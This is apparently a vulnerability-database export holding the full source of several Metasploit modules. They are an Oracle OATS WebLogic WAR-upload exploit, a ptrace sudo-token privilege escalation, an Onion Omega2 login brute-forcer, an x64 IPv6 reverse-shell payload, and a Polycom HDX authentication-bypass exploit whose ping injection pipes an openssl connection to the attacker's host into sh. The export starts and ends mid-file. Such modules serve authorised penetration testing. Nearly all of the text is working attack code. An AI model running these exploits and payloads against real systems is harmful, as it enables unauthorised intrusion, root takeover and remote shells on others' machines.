'C:\\\\OracleATS'])\n ])\n end\n\n class LoginSpec\n attr_accessor :admin_console_session\n end\n\n def login_spec\n @login_spec ||= LoginSpec.new\n end\n\n class OatsWarPayload < MetasploitModule\n attr_reader :name\n attr_reader :war\n\n def initialize(payload)\n @name = [Faker::App.name, Rex::Text.rand_name].sample\n @war = payload.encoded_war(app_name: name).to_s\n end\n end\n\n def default_oats_path\n datastore['DefaultOatsPath']\n end\n\n def war_payload\n @war_payload ||= OatsWarPayload.new(payload)\n end\n\n def set_frsc\n value = get_deploy_frsc\n @frsc = value\n end\n\n def check\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 
'console', 'login', 'LoginForm.jsp')\n })\n\n if res && res.body.include?('Oracle WebLogic Server Administration Console')\n return Exploit::CheckCode::Detected\n end\n\n Exploit::CheckCode::Safe\n end\n\n def set_admin_console_session(res)\n cookie = res.get_cookies\n admin_console_session = cookie.scan(/ADMINCONSOLESESSION=(.+);/).flatten.first\n vprint_status(\"Token for console session is: #{admin_console_session}\")\n login_spec.admin_console_session = admin_console_session\n end\n\n def is_logged_in?(res)\n html = res.get_html_document\n a_element = html.at('a')\n if a_element.respond_to?(:attributes) && a_element.attributes['href']\n link = a_element.attributes['href'].value\n return URI(link).request_uri == '/console'\n end\n\n false\n end\n\n def do_login\n uri = normalize_uri(target_uri.path, 'console', 'login', 'LoginForm.jsp')\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => uri\n })\n\n fail_with(Failure::Unknown, 'No response from server') unless res\n set_admin_console_session(res)\n\n uri = normalize_uri(target_uri.path, 'console', 'j_security_check')\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => uri,\n 'cookie' => \"ADMINCONSOLESESSION=#{login_spec.admin_console_session}\",\n 'vars_post' =>\n {\n 'j_username' => datastore['OATSUSERNAME'],\n 'j_password' => datastore['OATSPASSWORD'],\n 'j_character_encoding' => 'UTF-8'\n }\n })\n\n fail_with(Failure::Unknown, 'No response while trying to log in') unless res\n fail_with(Failure::NoAccess, 'Failed to login') unless is_logged_in?(res)\n store_valid_credential(user: datastore['OATSUSERNAME'], private: datastore['OATSPASSWORD'])\n set_admin_console_session(res)\n end\n\n def get_deploy_frsc\n # First we are just going through the pages in a specific order to get the FRSC value\n # we need to prepare uploading the WAR file.\n res = nil\n requests =\n [\n { path: 'console/', vars: {} },\n { path: 'console/console.portal', vars: {'_nfpb'=>\"true\"} },\n { path: 
'console/console.portal', vars: {'_nfpb'=>\"true\", '_pageLabel' => 'HomePage1'} }\n ]\n\n requests.each do |req|\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, req[:path]),\n 'cookie' => \"ADMINCONSOLESESSION=#{login_spec.admin_console_session}\",\n 'vars_get' => req[:vars]\n })\n\n fail_with(Failure::Unknown, 'No response while retrieving FRSC') unless res\n end\n\n html = res.get_html_document\n hidden_input = html.at('input[@name=\"ChangeManagerPortletfrsc\"]')\n frsc_attr = hidden_input.respond_to?(:attributes) ? hidden_input.attributes['value'] : nil\n frsc_attr ? frsc_attr.value : ''\n end\n\n def do_select_upload_action\n action = '/com/bea/console/actions/app/install/selectUploadApp'\n app_path = Rex::FileUtils.normalize_win_path(default_oats_path, 'oats\\\\servers\\\\AdminServer\\\\upload')\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'console', 'console.portal'),\n 'cookie' => \"ADMINCONSOLESESSION=#{login_spec.admin_console_session}\",\n 'vars_get' =>\n {\n 'AppApplicationInstallPortlet_actionOverride' => action\n },\n 'vars_post' =>\n {\n 'AppApplicationInstallPortletselectedAppPath' => app_path,\n 'AppApplicationInstallPortletfrsc' => frsc\n }\n })\n\n fail_with(Failure::Unknown, \"No response from #{action}\") unless res\n end\n\n def do_upload_app_action\n action = '/com/bea/console/actions/app/install/uploadApp'\n ctype = 'application/octet-stream'\n app_cname = 'AppApplicationInstallPortletuploadAppPath'\n plan_cname = 'AppApplicationInstallPortletuploadPlanPath'\n frsc_cname = 'AppApplicationInstallPortletfrsc'\n war = war_payload.war\n war_name = war_payload.name\n post_data = Rex::MIME::Message.new\n post_data.add_part(war, ctype, 'binary', \"form-data; name=\\\"#{app_cname}\\\"; filename=\\\"#{war_name}.war\\\"\")\n post_data.add_part('', ctype, nil, \"form-data; name=\\\"#{plan_cname}\\\"; filename=\\\"\\\"\")\n post_data.add_part(frsc, nil, nil, 
\"form-data; name=\\\"#{frsc_cname}\\\"\")\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'console', 'console.portal'),\n 'cookie' => \"ADMINCONSOLESESSION=#{login_spec.admin_console_session}\",\n 'vars_get' =>\n {\n 'AppApplicationInstallPortlet_actionOverride' => action\n },\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\n 'data' => post_data.to_s\n })\n\n fail_with(Failure::Unknown, \"No response from #{action}\") unless res\n print_response_message(res)\n end\n\n def do_app_select_action\n action = '/com/bea/console/actions/app/install/appSelected'\n war_name = war_payload.name\n app_path = Rex::FileUtils.normalize_win_path(default_oats_path, \"oats\\\\servers\\\\AdminServer\\\\upload\\\\#{war_name}.war\")\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'console', 'console.portal'),\n 'cookie' => \"ADMINCONSOLESESSION=#{login_spec.admin_console_session}\",\n 'vars_get' =>\n {\n 'AppApplicationInstallPortlet_actionOverride' => action\n },\n 'vars_post' =>\n {\n 'AppApplicationInstallPortletselectedAppPath' => app_path,\n 'AppApplicationInstallPortletfrsc' => frsc\n }\n })\n\n fail_with(Failure::Unknown, \"No response from #{action}\") unless res\n print_response_message(res)\n end\n\n def do_style_select_action\n action = '/com/bea/console/actions/app/install/targetStyleSelected'\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'console', 'console.portal'),\n 'cookie' => \"ADMINCONSOLESESSION=#{login_spec.admin_console_session}\",\n 'vars_get' =>\n {\n 'AppApplicationInstallPortlet_actionOverride' => action\n },\n 'vars_post' =>\n {\n 'AppApplicationInstallPortlettargetStyle' => 'Application',\n 'AppApplicationInstallPortletfrsc' => frsc\n }\n })\n\n fail_with(Failure::Unknown, \"No response from #{action}\") unless res\n end\n\n def do_finish_action\n action = '/com/bea/console/actions/app/install/finish'\n\n 
res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'console', 'console.portal'),\n 'cookie' => \"ADMINCONSOLESESSION=#{login_spec.admin_console_session}\",\n 'vars_get' =>\n {\n 'AppApplicationInstallPortlet_actionOverride' => action\n },\n 'vars_post' =>\n {\n 'AppApplicationInstallPortletname' => war_payload.name,\n 'AppApplicationInstallPortletsecurityModel' => 'DDOnly',\n 'AppApplicationInstallPortletstagingStyle' => 'Default',\n 'AppApplicationInstallPortletplanStagingStyle' => 'Default',\n 'AppApplicationInstallPortletfrsc' => frsc\n }\n })\n\n fail_with(Failure::Unknown, \"No response from #{action}\") unless res\n print_response_message(res)\n\n # 302 is a good enough indicator of a successful upload, otherwise\n # the server would actually return a 200 with an error message.\n res.code == 302\n end\n\n def print_response_message(res)\n html = res.get_html_document\n message_div = html.at('div[@class=\"message\"]')\n if message_div\n msg = message_div.at('span').text\n print_status(\"Server replies: #{msg.inspect}\")\n end\n end\n\n def deploy_war\n set_frsc\n print_status(\"FRSC value: #{frsc}\")\n do_select_upload_action\n do_upload_app_action\n do_app_select_action\n do_style_select_action\n do_finish_action\n end\n\n def goto_war(name)\n print_good(\"Operation \\\"#{name}\\\" is a go!\")\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, name)\n })\n\n print_status(\"Code #{res.code} on \\\"#{name}\\\" request\") if res\n end\n\n def undeploy_war\n war_name = war_payload.name\n handle = 'com.bea.console.handles.JMXHandle(\"com.bea:Name=oats,Type=Domain\")'\n contents = %Q|com.bea.console.handles.AppDeploymentHandle(\"com.bea:Name=#{war_name},Type=AppDeployment\")|\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'console', 'console.portal'),\n 'cookie' => \"ADMINCONSOLESESSION=#{login_spec.admin_console_session}\",\n 'vars_get' =>\n {\n 
'AppApplicationUninstallPortletreturnTo' => 'AppDeploymentsControlPage',\n 'AppDeploymentsControlPortlethandle' => handle\n },\n 'vars_post' =>\n {\n # For some reason, the value given to the server is escapped twice.\n # The Metasploit API should do it at least once.\n 'AppApplicationUninstallPortletchosenContents' => CGI.escape(contents),\n '_pageLabel' => 'AppApplicationUninstallPage',\n '_nfpb' => 'true',\n 'AppApplicationUninstallPortletfrsc' => frsc\n }\n })\n\n if res && res.code == 302\n print_good(\"Successfully undeployed #{war_name}.war\")\n else\n print_warning(\"Unable to successfully undeploy #{war_name}.war\")\n print_warning('You may want to do so manually.')\n end\n end\n\n def cleanup\n undeploy_war if is_cleanup_ready\n super\n end\n\n def setup\n @is_cleanup_ready = false\n super\n end\n\n def exploit\n unless check == Exploit::CheckCode::Detected\n print_status('Target does not have the login page we are looking for.')\n return\n end\n\n do_login\n print_good(\"Logged in as #{datastore['OATSUSERNAME']}:#{datastore['OATSPASSWORD']}\")\n print_status(\"Ready for war. Codename \\\"#{war_payload.name}\\\" at #{war_payload.war.length} bytes\")\n result = deploy_war\n if result\n @is_cleanup_ready = true\n goto_war(war_payload.name)\n end\n end\n\n attr_reader :frsc\n attr_reader :is_cleanup_ready\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/oats_weblogic_console.rb"}, {"lastseen": "2019-11-28T14:45:19", "bulletinFamily": "exploit", "description": "This module attempts to gain root privileges by blindly injecting into the session user's running shell processes and executing commands by calling `system()`, in the hope that the process has valid cached sudo tokens with root privileges. The system must have gdb installed and permit ptrace. 
This module has been tested successfully on: Debian 9.8 (x64); and CentOS 7.4.1708 (x64).\n", "modified": "2019-08-10T07:03:23", "published": "2019-04-30T21:54:18", "id": "MSF:EXPLOIT/LINUX/LOCAL/PTRACE_SUDO_TOKEN_PRIV_ESC", "href": "", "type": "metasploit", "title": "ptrace Sudo Token Privilege Escalation", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Kernel\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'ptrace Sudo Token Privilege Escalation',\n 'Description' => %q{\n This module attempts to gain root privileges by blindly injecting into\n the session user's running shell processes and executing commands by\n calling `system()`, in the hope that the process has valid cached sudo\n tokens with root privileges.\n\n The system must have gdb installed and permit ptrace.\n\n This module has been tested successfully on:\n\n Debian 9.8 (x64); and\n CentOS 7.4.1708 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'chaignc', # sudo_inject\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2019-03-24',\n 'References' =>\n [\n ['EDB', '46989'],\n ['URL', 'https://github.com/nongiach/sudo_inject'],\n ['URL', 'https://www.kernel.org/doc/Documentation/security/Yama.txt'],\n ['URL', 'http://man7.org/linux/man-pages/man2/ptrace.2.html'],\n ['URL', 'https://lwn.net/Articles/393012/'],\n ['URL', 'https://lwn.net/Articles/492667/'],\n ['URL', 'https://linux-audit.com/protect-ptrace-processes-kernel-yama-ptrace_scope/'],\n ['URL', 'https://blog.gdssecurity.com/labs/2017/9/5/linux-based-inter-process-code-injection-without-ptrace2.html']\n ],\n 'Platform' => ['linux'],\n 'Arch' =>\n 
[\n ARCH_X86,\n ARCH_X64,\n ARCH_ARMLE,\n ARCH_AARCH64,\n ARCH_PPC,\n ARCH_MIPSLE,\n ARCH_MIPSBE\n ],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'DefaultOptions' =>\n {\n 'PrependSetresuid' => true,\n 'PrependSetresgid' => true,\n 'PrependFork' => true,\n 'WfsDelay' => 30\n },\n 'DefaultTarget' => 0))\n register_options [\n OptInt.new('TIMEOUT', [true, 'Process injection timeout (seconds)', '30'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def timeout\n datastore['TIMEOUT']\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def check\n if yama_enabled?\n vprint_error 'YAMA ptrace scope is restrictive'\n return CheckCode::Safe\n end\n vprint_good 'YAMA ptrace scope is not restrictive'\n\n if command_exists? '/usr/sbin/getsebool'\n if cmd_exec(\"/usr/sbin/getsebool deny_ptrace 2>1 | /bin/grep -q on && echo true\").to_s.include? 'true'\n vprint_error 'SELinux deny_ptrace is enabled'\n return CheckCode::Safe\n end\n vprint_good 'SELinux deny_ptrace is disabled'\n end\n\n unless command_exists? 'sudo'\n vprint_error 'sudo is not installed'\n return CheckCode::Safe\n end\n vprint_good 'sudo is installed'\n\n unless command_exists? 'gdb'\n vprint_error 'gdb is not installed'\n return CheckCode::Safe\n end\n vprint_good 'gdb is installed'\n\n CheckCode::Detected\n end\n\n def exploit\n unless check == CheckCode::Detected\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. 
Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n if nosuid? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is mounted nosuid\"\n end\n\n # Find running shell processes\n shells = %w[ash ksh csh dash bash zsh tcsh fish sh]\n\n system_shells = read_file('/etc/shells').to_s.each_line.map {|line|\n line.strip\n }.reject {|line|\n line.starts_with?('#')\n }.each {|line|\n shells << line.split('/').last\n }\n shells = shells.uniq.reject {|shell| shell.blank?}\n\n print_status 'Searching for shell processes ...'\n pids = []\n if command_exists? 'pgrep'\n cmd_exec(\"pgrep '^(#{shells.join('|')})$' -u \\\"$(id -u)\\\"\").to_s.each_line do |pid|\n pids << pid.strip\n end\n else\n shells.each do |s|\n pidof(s).each {|p| pids << p.strip}\n end\n end\n\n if pids.empty?\n fail_with Failure::Unknown, 'Found no running shell processes'\n end\n\n print_status \"Found #{pids.uniq.length} running shell processes\"\n vprint_status pids.join(', ')\n\n # Upload payload\n @payload_path = \"#{base_dir}/.#{rand_text_alphanumeric 10..15}\"\n upload @payload_path, generate_payload_exe\n\n # Blindly call system() in each shell process\n pids.each do |pid|\n print_status \"Injecting into process #{pid} ...\"\n\n cmds = \"echo | sudo -S /bin/chown 0:0 #{@payload_path} >/dev/null 2>&1 && echo | sudo -S /bin/chmod 4755 #{@payload_path} >/dev/null 2>&1\"\n sudo_inject = \"echo 'call system(\\\"#{cmds}\\\")' | gdb -q -n -p #{pid} >/dev/null 2>&1\"\n res = cmd_exec sudo_inject, nil, timeout\n vprint_line res unless res.blank?\n\n next unless setuid? 
@payload_path\n\n print_good \"#{@payload_path} setuid root successfully\"\n print_status 'Executing payload...'\n res = cmd_exec \"#{@payload_path} & echo \"\n vprint_line res\n return\n end\n\n fail_with Failure::NoAccess, 'Failed to create setuid root shell. Session user has no valid cached sudo tokens.'\n end\n\n def on_new_session(session)\n if session.type.eql? 'meterpreter'\n session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'\n session.fs.file.rm @payload_path\n else\n session.shell_command_token \"rm -f '#{@payload_path}'\"\n end\n ensure\n super\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/ptrace_sudo_token_priv_esc.rb"}, {"lastseen": "2019-12-04T20:29:54", "bulletinFamily": "exploit", "description": "OnionOS login scanner module for Onion Omega2 devices.\n", "modified": "2019-04-25T17:43:55", "published": "2019-03-30T14:37:05", "id": "MSF:AUXILIARY/SCANNER/HTTP/ONION_OMEGA2_LOGIN", "href": "", "type": "metasploit", "title": "Onion Omega2 Login Brute-Force", "sourceData": "#!/usr/bin/env python2.7\n# -*- coding: utf-8 -*-\n# 2019-03-27 05-55\n\n# Standard Modules\nfrom metasploit import module, login_scanner\nimport json\n\n# Extra Modules\ndependencies_missing = False\ntry:\n import requests\nexcept ImportError:\n dependencies_missing = True\n\n# Metasploit Metadata\nmetadata = {\n 'name': 'Onion Omega2 Login Brute-Force',\n 'description': '''\n OnionOS login scanner module for Onion Omega2 devices.\n ''',\n 'authors': [\n 'Not So Attractive <github.com/nsa>'\n ],\n 'date': '2019-03-27',\n 'license': 'MSF_LICENSE',\n 'references': [\n ],\n 'type': 'single_host_login_scanner',\n 'options': {\n 'rhost': {'type': 'address', 'description': 'Host to target', 'required': True},\n 'rport': {'type': 'port', 'description': 'Port to target', 'required': True, 'default': '80'},\n 'userpass': {'type': 'string', 'description': 'A list 
of username/password combinations to try',\n 'required': False},\n 'sleep_interval': {'type': 'float', 'description': 'Time in seconds to wait between login attempts',\n 'required': False}\n },\n 'service_name': 'Onion Omega2 HTTPd Ubus',\n}\n\n\ndef valid_login(host, rport, username, password):\n payload = {\n \"jsonrpc\": \"2.0\", \"id\": 0, \"method\": \"call\", \"params\": [\"0\" * 32, \"session\", \"login\",\n {\n \"username\": username,\n \"password\": password\n }]}\n url = 'http://' + str(host) + ':' + str(rport) + '/ubus'\n session = requests.Session()\n try:\n request = session.post(url, json=payload)\n response = json.loads(request.text)\n if response['result'][0] != 6 and len(response['result']) > 1:\n ubus_rpc_session = response['result'][1]['ubus_rpc_session']\n module.log('Ubus RPC Session: ' + ubus_rpc_session, level='good')\n else:\n return False\n except requests.exceptions.ConnectionError:\n module.log(\"Unhandled exception: ConnectionError\", level='error')\n return False\n except ValueError:\n module.log(\"Unhandled exception: Response JSON DecodeError\", level='error')\n return False\n except KeyError:\n module.log(\"Unhandled exception: Dictionary KerError in Response\", level='error')\n return False\n else:\n return True\n\n\ndef run(args):\n if dependencies_missing:\n module.log('Python requests module missing, cannot continue', level='error')\n return\n scanner = login_scanner.make_scanner(\n lambda host, rport, username, password: valid_login(host, rport, username, password))\n scanner(args)\n\n\nif __name__ == '__main__':\n module.run(metadata, run)\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/onion_omega2_login.py"}, {"lastseen": "2019-11-27T21:30:23", "bulletinFamily": "exploit", "description": "Connect back to attacker and spawn a command shell over IPv6\n", "modified": "2018-12-07T02:18:21", "published": "2018-11-29T03:58:12", 
"id": "MSF:PAYLOAD/LINUX/X64/SHELL_REVERSE_IPV6_TCP", "href": "", "type": "metasploit", "title": "Linux x64 Command Shell, Reverse TCP Inline (IPv6)", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/base/sessions/command_shell'\nrequire 'msf/base/sessions/command_shell_options'\n\nmodule MetasploitModule\n\n CachedSize = 90\n\n include Msf::Payload::Single\n include Msf::Payload::Linux\n include Msf::Sessions::CommandShellOptions\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Linux x64 Command Shell, Reverse TCP Inline (IPv6)',\n 'Description' => 'Connect back to attacker and spawn a command shell over IPv6',\n 'Author' => 'epi <epibar052[at]gmail.com>',\n 'License' => MSF_LICENSE,\n 'Platform' => 'linux',\n 'Arch' => ARCH_X64,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Session' => Msf::Sessions::CommandShellUnix,\n ))\n register_options([\n OptInt.new('SCOPEID', [false, \"IPv6 scope ID, for link-local addresses\", 0])\n ])\n end\n\n def convert_input(value, padding, reverse=false)\n # converts value to comma separated string of\n # zero-padded bytes to be used in the db instruction\n arr = value.to_s(16).rjust(padding, \"0\").scan(/../)\n\n if reverse\n arr = arr.reverse\n end\n\n arr.map{ |x| sprintf(\"0x%02x\", x.hex) }.join(',')\n end\n\n def generate_stage\n # 22 -> \"0x00,0x16\"\n # 4444 -> \"0x11,0x5c\"\n tcp_port = convert_input(datastore['LPORT'], 4)\n\n # 0 -> \"0x00,0x00,0x00,0x00\"\n scope_id = convert_input(datastore['SCOPEID'], 8, true)\n\n # ::1 -> \"0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01\"\n # dead:beef:2::1009 -> \"0xde,0xad,0xbe,0xef,0x00,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0x09\"\n ipv6_addr = convert_input(IPAddr.new(datastore['LHOST'], Socket::AF_INET6).to_i, 32)\n\n payload = <<-EOS\n socket_call:\n ; int 
socket(int domain, int type, int protocol)\n\n push 0x29\n pop rax ; socket syscall\n push 0xa\n pop rdi ; AF_INET6\n push 0x1\n pop rsi ; SOCK_STREAM\n xor edx,edx ; auto-select protocol \n syscall\n\n push rax\n pop rdi ; store socket fd \n jmp get_address ; jmp-call-pop\n\n populate_sockaddr_in6:\n ; struct sockaddr_in6 {\n ; sa_family_t sin6_family; /* AF_INET6 */\n ; in_port_t sin6_port; /* port number */\n ; uint32_t sin6_flowinfo; /* IPv6 flow information */\n ; struct in6_addr sin6_addr; /* IPv6 address */\n ; uint32_t sin6_scope_id; /* Scope ID (new in 2.4) */\n ; };\n\n ; struct in6_addr {\n ; unsigned char s6_addr[16]; /* IPv6 address */\n ; };\n\n pop rsi ; store pointer to struct\n\n connect_call:\n ; int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen);\n ; rdi -> already contains server socket fd\n ; rsi -> already contains pointer to sockaddr_in6 struct \n push 0x2a\n pop rax ; connect syscall \n push 0x1c\n pop rdx ; length of sockaddr_in6 (28)\n syscall\n\n dup2_calls:\n ; int dup2(int oldfd, int newfd);\n ; rdi -> already contains server socket fd\n push 0x3\n pop rsi ; newfd \n\n dup2_loop:\n ; 2 -> 1 -> 0 (3 iterations)\n push 0x21\n pop rax ; dup2 syscall\n dec esi\n syscall\n loopnz dup2_loop\n\n exec_call:\n ; int execve(const char *filename, char *const argv[], char *const envp[]);\n push 0x3b\n pop rax ; execve call\n cdq ; zero-out rdx via sign-extension\n mov rbx, '/bin/sh'\n push rbx\n push rsp\n pop rdi ; address of /bin/sh\n syscall\n\n get_address:\n call populate_sockaddr_in6\n ; sin6_family(2), sin6_port(2), sin6_flowinfo(4), sockaddr_in6(16), sin6_scope_id(4)\n db 0x0a,0x00,#{tcp_port},0x00,0x00,0x00,0x00,#{ipv6_addr},#{scope_id}\n EOS\n\n Metasm::Shellcode.assemble(Metasm::X86_64.new, payload).encode_string\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/singles/linux/x64/shell_reverse_ipv6_tcp.rb"}, 
{"lastseen": "2019-10-23T16:10:41", "bulletinFamily": "exploit", "description": "The login component of the Polycom Command Shell on Polycom HDX video endpoints, running software versions 3.0.5 and earlier, is vulnerable to an authorization bypass when simultaneous connections are made to the service, allowing remote network attackers to gain access to a sandboxed telnet prompt without authentication. Versions prior to 3.0.4 contain OS command injection in the ping command which can be used to execute arbitrary commands as root.\n", "modified": "2018-11-04T06:14:26", "published": "2018-11-04T06:14:26", "id": "MSF:EXPLOIT/UNIX/MISC/POLYCOM_HDX_AUTH_BYPASS", "href": "", "type": "metasploit", "title": "Polycom Command Shell Authorization Bypass", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n include Msf::Exploit::Remote::Tcp\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Polycom Command Shell Authorization Bypass',\n 'Alias' => 'polycom_hdx_auth_bypass',\n 'Author' =>\n [\n 'Paul Haas <Paul [dot] Haas [at] Security-Assessment.com>', # module\n 'h00die <mike@shorebreaksecurity.com>', # submission/cleanup\n ],\n 'DisclosureDate' => 'Jan 18 2013',\n 'Description' => %q(\n The login component of the Polycom Command Shell on Polycom HDX\n video endpoints, running software versions 3.0.5 and earlier,\n is vulnerable to an authorization bypass when simultaneous\n connections are made to the service, allowing remote network\n attackers to gain access to a sandboxed telnet prompt without\n authentication. 
Versions prior to 3.0.4 contain OS command\n injection in the ping command which can be used to execute\n arbitrary commands as root.\n ),\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'URL', 'http://www.security-assessment.com/files/documents/advisory/Polycom%20HDX%20Telnet%20Authorization%20Bypass%20-%20RELEASE.pdf' ],\n [ 'URL', 'http://blog.tempest.com.br/joao-paulo-campello/polycom-web-management-interface-os-command-injection.html' ],\n [ 'EDB', '24494']\n ],\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Privileged' => true,\n 'Targets' => [ [ \"Universal\", {} ] ],\n 'Payload' =>\n {\n 'Space' => 8000,\n 'DisableNops' => true,\n 'Compat' => { 'PayloadType' => 'cmd' }\n },\n 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_openssl' },\n 'DefaultTarget' => 0\n )\n )\n\n register_options(\n [\n Opt::RHOST(),\n Opt::RPORT(23),\n OptAddress.new('CBHOST', [ false, \"The listener address used for staging the final payload\" ]),\n OptPort.new('CBPORT', [ false, \"The listener port used for staging the final payload\" ])\n ], self.class\n )\n register_advanced_options(\n [\n OptInt.new('THREADS', [false, 'Threads for authentication bypass', 6]),\n OptInt.new('MAX_CONNECTIONS', [false, 'Threads for authentication bypass', 100])\n ], self.class\n )\n end\n\n def check\n connect\n sock.put(Rex::Text.rand_text_alpha(rand(5) + 1) + \"\\n\")\n Rex.sleep(1)\n res = sock.get_once\n disconnect\n\n if !res && !res.empty?\n return Exploit::CheckCode::Safe\n end\n\n if res =~ /Welcome to ViewStation/\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n def exploit\n # Keep track of results (successful connections)\n results = []\n\n # Random string for password\n password = Rex::Text.rand_text_alpha(rand(5) + 1)\n\n # Threaded login checker\n max_threads = datastore['THREADS']\n cur_threads = []\n\n # Try up to 100 times just to be sure\n queue = [*(1..datastore['MAX_CONNECTIONS'])]\n\n print_status(\"Starting Authentication bypass 
with #{datastore['THREADS']} threads with #{datastore['MAX_CONNECTIONS']} max connections \")\n until queue.empty?\n while cur_threads.length < max_threads\n\n # We can stop if we get a valid login\n break unless results.empty?\n\n # keep track of how many attempts we've made\n item = queue.shift\n\n # We can stop if we reach max tries\n break unless item\n\n t = Thread.new(item) do |count|\n sock = connect\n sock.put(password + \"\\n\")\n res = sock.get_once\n\n until res.empty?\n break unless results.empty?\n\n # Post-login Polycom banner means success\n if res =~ /Polycom/\n results << sock\n break\n # bind error indicates bypass is working\n elsif res =~ /bind/\n sock.put(password + \"\\n\")\n # Login error means we need to disconnect\n elsif res =~ /failed/\n break\n # To many connections means we need to disconnect\n elsif res =~ /Error/\n break\n end\n res = sock.get_once\n end\n end\n\n cur_threads << t\n end\n\n # We can stop if we get a valid login\n break unless results.empty?\n\n # Add to a list of dead threads if we're finished\n cur_threads.each_index do |ti|\n t = cur_threads[ti]\n unless t.alive?\n cur_threads[ti] = nil\n end\n end\n\n # Remove any dead threads from the set\n cur_threads.delete(nil)\n\n Rex.sleep(0.25)\n end\n\n # Clean up any remaining threads\n cur_threads.each { |sock| sock.kill }\n\n if !results.empty?\n print_good(\"#{rhost}:#{rport} Successfully exploited the authentication bypass flaw\")\n do_payload(results[0])\n else\n print_error(\"#{rhost}:#{rport} Unable to bypass authentication, this target may not be vulnerable\")\n end\n end\n\n def do_payload(sock)\n # Prefer CBHOST, but use LHOST, or autodetect the IP otherwise\n cbhost = datastore['CBHOST'] || datastore['LHOST'] || Rex::Socket.source_address(datastore['RHOST'])\n\n # Start a listener\n start_listener(true)\n\n # Figure out the port we picked\n cbport = self.service.getsockname[2]\n\n # Utilize ping OS injection to push cmd payload using stager optimized for limited 
buffer < 128\n cmd = \"\\nping ;s=$IFS;openssl${s}s_client$s-quiet$s-host${s}#{cbhost}$s-port${s}#{cbport}|sh;ping$s-c${s}1${s}0\\n\"\n sock.put(cmd)\n\n # Give time for our command to be queued and executed\n 1.upto(5) do\n Rex.sleep(1)\n break if session_created?\n end\n end\n\n def stage_final_payload(cli)\n print_good(\"Sending payload of #{payload.encoded.length} bytes to #{cli.peerhost}:#{cli.peerport}...\")\n cli.put(payload.encoded + \"\\n\")\n end\n\n def start_listener(ssl = false)\n comm = datastore['ListenerComm']\n if comm == 'local'\n comm = ::Rex::Socket::Comm::Local\n else\n comm = nil\n end\n\n self.service = Rex::Socket::TcpServer.create(\n 'LocalPort' => datastore['CBPORT'],\n 'SSL' => ssl,\n 'SSLCert' => datastore['SSLCert'],\n 'Comm' => comm,\n 'Context' =>\n {\n 'Msf' => framework,\n 'MsfExploit' => self\n }\n )\n\n self.service.on_client_connect_proc = proc { |client|\n stage_final_payload(client)\n }\n\n # Start the listening service\n self.service.start\n end\n\n # 